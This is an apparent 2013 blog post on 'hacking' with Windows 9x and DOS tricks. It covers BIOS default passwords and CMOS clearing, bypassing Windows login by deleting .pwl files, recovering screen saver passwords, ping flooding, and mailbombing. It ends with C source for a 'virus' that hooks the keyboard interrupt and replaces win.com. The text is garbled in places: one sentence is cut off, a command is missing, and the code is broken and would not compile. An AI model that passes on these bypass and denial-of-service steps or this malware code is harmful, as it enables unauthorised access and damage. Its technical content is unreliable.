Friday, July 26, 2013
Hacking
1. Introduction:
Hacking is an intellectual activity and
a sort of mental gymnasium. Hackers are really intellectual people who have the
extra bit of information.
Hackers were computer geeks who knew
everything about the way of software works. They have this uncanny ability of
finding out ways of doing the impossible.
They debug code and use trial and error
methods to discover unknown and new tricks and secrets. They do try to break
into systems but have the decency not to cause any damage but instead they
report the whole to the system administrator.
2. Hackers Vs
Crackers:
A
hacker is a computer freak who peeps into others computers without harming
them. Hackers are actually nice people from which you could actually learn a
lot.
However, after saying all this I must
admit that there is a thin line between hackers and crackers.
Crackers are the nerd persons with an
intention of harming others computers. Besides unauthorized entry they try to
destroy others resources.
3. Hacking BIOS
passwords:
BIOS are the basic settings on your
computer, such as how many and what kinds of disk drives you have, which ones
are enabled and which are disabled and which ones are used for booting. These
settings are held in the CMOS chip on the motherboard.
A common method of entering the BIOS is
pressing the Del
J262
AWARD_SW
AWARD_PW
The
Company name and version of the BIOS is displayed on the screen each time the
system boots.
If
the default passwords did not work, the other way is remove the lithium battery
from the computer and put it back after 30 seconds.
On many computers a series of keystrokes
may carsh the password program. Boot the PC and wait for the password prompt,
then keep pressing Ctrl + Esc 50 to 100 times. This will result in the crashing
of the password program and the computer will continue booting.
This is a password hack but it just
clears the BIOS so that the next time you start the PC, the CMOS does not ask
for any password. To clear the CMOS, do the following:
Get DOS and
type:
DEBUG, hit
enter
-0 70 2e hit
enter
-0 71 ff hit
enter
-q hit enter
exit hit enter
Restart the
computer
4. Windows
torn apart:
Hacking
Windows Login Passwords:
To hack the windows login password,
reboot and wait for the message:
“Starting
Windows 9x…”
When
you see this on the screen, press F8. The boot menu will come up. Select option
7, to boot into Dos. Then go to the windows directory by typing
C :\> cd
windows
Then rename all files with the extension
.pwl by typing the following command:
C: \windows>ren
*.pwl *.xyz
Or, delete
them by typing
C:\windows>del
*.pwl
Now when the windows password login pops
up, you can write any thing in the place where the password has got to be
typed. Windows just takes it as the original password.
Suppose if the F8 key is disabled then
boot from the floppy and delete *.pwl from windows directory.
There is a way of disabling the F8 key.
Simply follow the following steps.
1.
Find the file msdos.sys which can be
found at c:\. Since this is a hidden
system file, you will have to make it writeable by changing its attributes and
by typing
C:\>attrib msdos.sys –h –w
2.
Open msdos.sys in WordPad
3.
you will see something that looks like this:
; FORMAT
[Paths]
WinDir=C:
\WINDOWS
WinBootDir=C:
\WINDOWS
HostWinBootDrv=C
[Options]
BootMenu=0(default)
BootMulti=1
BootGui=1
DoubleBuffer=1
AutoScan=1
WinVer=4.10.1998
;
To disable the function keys during boot up, directly below [Options]
you insert the following keys of code:
“BootDelay=0”
4.
Since msdos.sys is an important system
file you should
change its attributes back to read only and hidden by typing
attrib msdos.sys +h +r
Changing
Windows Visuals:
Changing windows logo:
If your computer is configured to work
normally, then a boring blue screen saying “Welcome to Windows 98” will welcome
every time you boot your system. The following procedure will change it to the
way the user wants Look for file named logo.sys. As it is a system file it is
kept hidden. Change its attributes by doing the following
Go
to MSDOS
Type
the following:
C:\windows\attrib
logos.sys –s –h –r
Now,
do the following steps to get welcome screen you want
Step1.
Open MSPaint
Step2.
From the File Menu select Open
Step3.
Open c:\Windows\logos.sys
Step4.
This opens the boring screen. You can change and save it as logos.sys
as shown in fig(a)
Step5.
Type at command prompt attrib logos.sys +h +r +s
Changing Shut Down Screen:
Go to command
prompt and make logow.sys writable
Open in paint
change what you want and save it as logow.sys
This changes
the boring shut down screen
Hacking
windows screen saver password:
This is an interesting hack and not many
people know about it. This requires no canned hacking tool, we will crack the
password manually.
If a screen saver is password protected,
then it does not allow us to do anything on a system until and unless we enter
the password. Here, not even CTRL+ALT+DEL
To begin with, Windows stores the
encrypted password in a file called “user.dat” file in the Windows directory.
Test the coding scheme in your own system by giving the letters whose codes you
are to know. Now you are armed with the letters and their corresponding codes
and you are at a step to break any password.
For example, let the password be DOPE.
Then the encryption scheme is:
D = 0C
O = A1
P = 26
E = 58
To break this password, open the
user.dat file and extract the corresponding codes by comparing with the codes
we have.
Customize
your Operating System by Editing Explorer.exe:
Do
not try to edit explorer.exe in Dos while running windows. It is a read only
file and windows will not allow you to edit.
Restart the
computer in MSDOS
Once you get
your Dos Prompt go to windows directory by typing
C:\>cd
windows
Once you are
in windows directory, open the file explorer.exe in MSDOS editor .i.e. type
C:\windows>edit/70
explorer.exe
The screen would
look like full of weird characters of something in machine language. Actually,
each symbol has a numeric value that we can see at the right bottom of the
screen at VALUE:
Line: 2334 to
line: 2348 deal with what appears when you click the Start Button, You can
change the name of Shut Down to any name, even the Programs to Hackings.
Then at line 2390 comes a very
interesting part. This line lets us change the text on START button to any
thing we want, you can have your name on the START button even your name is 132
letters long!!!
If you see carefully on LINE: 2390 you
will find that a clubs symbol precedes S t a r t. If you move the cursor over
the cursor over the club you will find that its value is 5. So, the text after
the clubs symbol, in this case S t a r t has to be of 5 letters. Now, if you
want to replace Start and in its place put something like stop which is 4
letters; then you will search for a symbol whose numeric value is 4 and paste
it over clubs symbol.
5. Registry
Hacking:
Structure of
Registry:
The registry is a hierarchical database
that contains virtually all information about yours computer’s configuration.
The registry editor is a utility by the
filename regedit.exe that allows you to see, search, modify and save the
registry database of windows.
The registry editor is divided into two
sections. In the left one there is a hierarchical structure of the database in
the right one, there are the values.
The
principal keys of the registry are:
HKEY_LOCAL_MACHINE:
This key contains any hardware,
applications and services information. Several hardware information is updated
automatically while the computer is booting. The data stored in this key is
shared with any user.
HKEY_CLASSES_ROOT:
This key is an alias of the branch HKEY_LOCAL_MACHINE\Software\Classes
and contains OLE, drag ‘n’ drop, shortcut and file association information.
HKEY_CURRENT_CONFIG
This key is also an alias of
HKEY_LOCAL_MACHINE\Config, with the current computer configuration.
HKEY_DYN_DATA
Some information in registry changes
frequently, so windows maintains part of the registry in memory instead of on
the hard disk. For example, it stores Computer performance
HKEY_USERS
This contains the information about
different users existing on the system.
HKEY_CURRENT_USER
This keep track of current user existing
in the system.
Disabling
display of drives in My Computer:
To disable the display of local drives
when you click My Computer go to:
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Now, in the right pane create a new
DWORD item and name it NoDrives. Modify its value and set it to 3FFFFFF. Press
F5 to refresh. When you click on My Computer, no drives will be shown. To
enable the display of drives in My Computer, simply delete this DWORD item.
CLSID Folders:
The
folders like Control Panel, Dial up Networking etc are system folders. Each
system folder has a unique CLSID key or Class Id which is a value.
The following are the CLSID values of
the most commonly used icons:
My Briefcase
:{ 85BBD920-42AO-1069-A234-08002B30309D}
My Computer :{
20D04FE0-3AEA-1069-A2D8-08002B303098}
Recycle Bin :{
645FF040-5081-101B-9F08-00AA002F954E}
To change the name of the Recycle Bin
folder go to
HKEY_CLASSES_ROOT\CLSID\ {645FF040-5081-101B-9F08-00AA002F954E}.
In the right pane change the default to
what ever name you want
To delete the Recycle Bin, go to
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\namespace
And delete the
key {645FF040-5081-101B-9F08-00AA002F954E}
To remove the
Find option from the go to
HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Policies\Explorer
Right click on the right pane and select
New, DWORD value. Name it NoFind. Double click the newly created DWORD to edit
its value and enter 1 as its value. This will disable the FIND option of the
Start Menu.
To restore the FIND command, simply
delete the DWORD value.
6. Peeping the
Internet:
It is so deadly that it can be used to
ping a hostname perpetually that may even cause the Host to crash. Now, what
happens is that when a host receives a ping signal, it allocates some of its
resources to attend to or echo back the datagram. Now if you ping a host
perpetually, then time will occur when all resources of the host are used and
the host either hangs or restarts.
You can even ping yourself. The IP
127.0.0.1 is the local host. This means that when you connect to 127.0.0.1, you
actually connect to your own machine. So to ping yourself perpetually, issue
the following command:
Tracert:
When you type hotmail.com in your
browser then your request passes through a large number of computers before
reaching hotmail.com. Or when you login to your shell account and type the
password then this password passes through large number of computers before
reaching the shell account server. To find the list of servers the password or
request passes through, one can use the TRACERT command.
Mailbombing:
Mail bombing means to send a huge number
of e-mails to a single e-mail account so that the maximum space of the account
is filled up and the owner of the account cannot receive any important e-mails
and it becomes difficult for the user to read existing e-mails.
All e-mail accounts have a maximum space
limit. For example, Yahoo has a space limit of 3MB. Now if this maximum space
is filled up then no new messages can come and the mail server sends back any
new messages that come so, if the victim who has been mailbombed is expecting
any new important messages, that he can pretty much kiss them good bye.
7.
Towards Cracking:
Virus:
Here we have a sample C code to
illustrate a sample virus that cracks “Win.com”.
The notion is to conquer the IVT, alter
the entry corresponding to interrupt number 0X09 to our user defined program
fragment. When any key is pressed, the control transfers to our code, where we
unload the command.com using system (exit) function to shut down the computer.
#include<stdio.h>
#include<process.h>
#define INTR 0x09
void interrupt
(* oldhandler)(…);
void interrupt
handler()
{
system(exit);
FILE
*fp=fopen(c:\\windows\\win.com”);
Fseek(fp,0,SEEK_END);
long l=ftell(fp);
if(l==123)
{
fclose(fp);
return;
}
System(“cd c:\\windows”);
System(“ren win.com oldwin.com”);
System(“ren mywin.com win.com”);
fclose(fp);
}
int main(void)
{
/* save old interrupt vector*/
oldhandler =getvect(INTR);
/*Install the new interrupt handler*/
setvect(INTR,handler);
keep(500);
return 0;
}
/*MyWin.cpp*/
#include<process.h>
main()
{
int result;
result=spawnl(P_WAIT,”tsr.exe”,null);
if(result==-1)
{
perror(“error from spawnl”);
}
return 0;
}
8. Pros & Cons:
Pros:
1. Fortifies
security in a devious fashion
2. checks
for loop holes in our application
3. calls
for high thinking and analyzing capability
4. explore
the uncovered
Cons:
1. Risk
of getting misunderstood
2. Risk
in loss of sensitive data
9. Conclusion:
At the deducting part, I am to utter
that hacking is a paranormal activity.
All hackers know that an important
hacker ethic is never to delete files, or cause any damage. Make good use of
your additional bit adorning your thought.
